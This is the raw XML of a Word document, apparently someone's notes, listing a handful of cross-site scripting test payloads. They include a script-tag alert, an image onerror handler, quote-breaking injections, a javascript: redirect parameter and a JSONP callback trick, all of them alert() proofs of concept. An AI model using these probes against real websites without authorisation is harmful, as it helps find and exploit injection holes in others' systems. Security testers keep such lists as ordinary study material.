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21445" w14:textId="5BA0B180" w:rsidR="00BE26C9" w:rsidRDefault="00BE26C9">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;alert(“hello”)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565C0DF5" w14:textId="77777777" w:rsidR="00EC2133" w:rsidRDefault="00A308AB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 = “image.gif” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = “alert()”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2490487F" w14:textId="77777777" w:rsidR="00717A72" w:rsidRDefault="00717A72"/>
    <w:p w14:paraId="4E39F778" w14:textId="77777777" w:rsidR="00717A72" w:rsidRDefault="00717A72">
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = alert(“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B328910" w14:textId="52508B7A" w:rsidR="00BE26C9" w:rsidRDefault="00BE26C9">
      <w:r>
        <w:t>‘)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>;alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7703B34A" w14:textId="70C85B40" w:rsidR="00BE26C9" w:rsidRDefault="00BE26C9">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>next</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascipt:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“hello”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D55D36F" w14:textId="477D5261" w:rsidR="009C14B9" w:rsidRDefault="009C14B9">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C14B9">
        <w:t>frame</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C14B9">
        <w:t>#//www.google.com/jsapi?callback=alert</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="009C14B9" w:rsidSect="00EC21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8AB"/>
    <w:rsid w:val="00411F73"/>
    <w:rsid w:val="00717A72"/>
    <w:rsid w:val="009C14B9"/>
    <w:rsid w:val="00A308AB"/>
    <w:rsid w:val="00BE26C9"/>
    <w:rsid w:val="00CD57E8"/>
    <w:rsid w:val="00EC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59C9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Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>self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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-07T20:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-14T01:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>